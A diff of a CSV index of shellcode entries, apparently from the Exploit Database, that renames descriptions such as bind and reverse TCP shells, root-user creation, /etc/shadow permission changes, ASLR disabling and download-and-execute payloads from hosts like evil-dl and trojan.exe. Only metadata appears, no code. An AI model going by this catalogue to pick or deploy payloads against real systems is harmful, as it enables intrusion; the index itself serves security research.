13447,shellcodes/linux_x86/13447.c,"Linux/x86 - execve /bin/sh + setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,shellcode,linux_x86
13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13448,shellcodes/linux_x86/13448.c,"Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13449,shellcodes/linux_x86/13449.c,"Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13450,shellcodes/linux_x86/13450.c,"Linux/x86 - Add Root User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",shellcode,linux_x86
13451,shellcodes/linux_x86/13451.c,"Linux/x86 - Add Root User Shellcode (104 bytes)",2004-09-12,"Matt Conover",shellcode,linux_x86
13452,shellcodes/linux_x86/13452.c,"Linux/x86 - Break chroot (../ 10x Loop) Shellcode (34 bytes)",2004-09-12,dev0id,shellcode,linux_x86
@ -217,7 +217,7 @@ id,file,description,date,author,type,platform
13460,shellcodes/linux_x86/13460.c,"Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)",2000-08-08,anonymous,shellcode,linux_x86
13461,shellcodes/linux_x86/13461.c,"Linux/x86 - Add Root User (z) Shellcode (70 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13462,shellcodes/linux_x86/13462.c,"Linux/x86 - setreuid(0_ 0) + Break chroot (mkdir/chdir/chroot _../_) + execve /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,shellcode,linux_x86
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13463,shellcodes/linux_x86-64/13463.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,shellcode,linux_x86-64
13464,shellcodes/linux_x86-64/13464.s,"Linux/x86-64 - execve /bin/sh Shellcode (33 bytes)",2006-11-02,hophet,shellcode,linux_x86-64
13465,shellcodes/multiple/13465.c,"Linux/PPC / Linux/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",shellcode,multiple
13466,shellcodes/multiple/13466.c,"OSX/PPC / OSX/x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,shellcode,multiple
@ -225,12 +225,12 @@ id,file,description,date,author,type,platform
13468,shellcodes/multiple/13468.c,"Linux/x86 / Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,shellcode,multiple
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,shellcode,multiple
13470,shellcodes/netbsd_x86/13470.c,"NetBSD/x86 - Kill All Processes Shellcode (23 bytes)",2009-06-18,anonymous,shellcode,netbsd_x86
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13471,shellcodes/netbsd_x86/13471.c,"NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13472,shellcodes/netbsd_x86/13472.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13473,shellcodes/netbsd_x86/13473.c,"NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)",2005-11-30,"p. minervini",shellcode,netbsd_x86
13474,shellcodes/netbsd_x86/13474.txt,"NetBSD/x86 - execve /bin/sh Shellcode (68 bytes)",2004-09-26,humble,shellcode,netbsd_x86
13475,shellcodes/openbsd_x86/13475.c,"OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-05-01,hophet,shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13476,shellcodes/openbsd_x86/13476.c,"OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)",2004-09-26,"Sinan Eren",shellcode,openbsd_x86
13477,shellcodes/openbsd_x86/13477.c,"OpenBSD/x86 - Add Root User (w00w00) Shellcode (112 bytes)",2004-09-26,anonymous,shellcode,openbsd_x86
13478,shellcodes/osx_ppc/13478.c,"OSX/PPC - sync() + reboot() Shellcode (32 bytes)",2006-05-01,hophet,shellcode,osx_ppc
13479,shellcodes/osx_ppc/13479.c,"OSX/PPC - execve(/bin/sh) + exit() Shellcode (72 bytes)",2006-05-01,hophet,shellcode,osx_ppc
@ -245,12 +245,12 @@ id,file,description,date,author,type,platform
13488,shellcodes/sco_x86/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL) Shellcode (43 bytes)",2005-11-30,"p. minervini",shellcode,sco_x86
13489,shellcodes/solaris_sparc/13489.c,"Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)",2006-11-21,xort,shellcode,solaris_sparc
13490,shellcodes/solaris_sparc/13490.c,"Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)",2006-10-21,bunker,shellcode,solaris_sparc
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13491,shellcodes/generator/13491.c,"Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)",2006-07-21,xort,shellcode,generator
13492,shellcodes/solaris_sparc/13492.c,"Solaris/SPARC - setreuid + execve Shellcode (56 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13493,shellcodes/solaris_sparc/13493.c,"Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)",2005-11-20,lhall,shellcode,solaris_sparc
13494,shellcodes/solaris_sparc/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",shellcode,solaris_sparc
13497,shellcodes/solaris_sparc/13497.txt,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc
13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator
13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh) + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86
@ -258,7 +258,7 @@ id,file,description,date,author,type,platform
13501,shellcodes/solaris_x86/13501.txt,"Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
@ -281,10 +281,10 @@ id,file,description,date,author,type,platform
13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
@ -297,7 +297,7 @@ id,file,description,date,author,type,platform
13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,sandman,shellcode,linux_x86
13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
@ -329,7 +329,7 @@ id,file,description,date,author,type,platform
13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86-64/13670.c,"Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86-64
13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
@ -370,11 +370,11 @@ id,file,description,date,author,type,platform
13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86
13828,shellcodes/windows/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows
13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
@ -386,20 +386,20 @@ id,file,description,date,author,type,platform
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14234,shellcodes/linux/14234.c,"Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
14235,shellcodes/linux/14235.c,"Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
14234,shellcodes/linux/14234.c,"Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux
14235,shellcodes/linux/14235.c,"Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux
14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
@ -407,24 +407,24 @@ id,file,description,date,author,type,platform
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
@ -435,41 +435,41 @@ id,file,description,date,author,type,platform
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
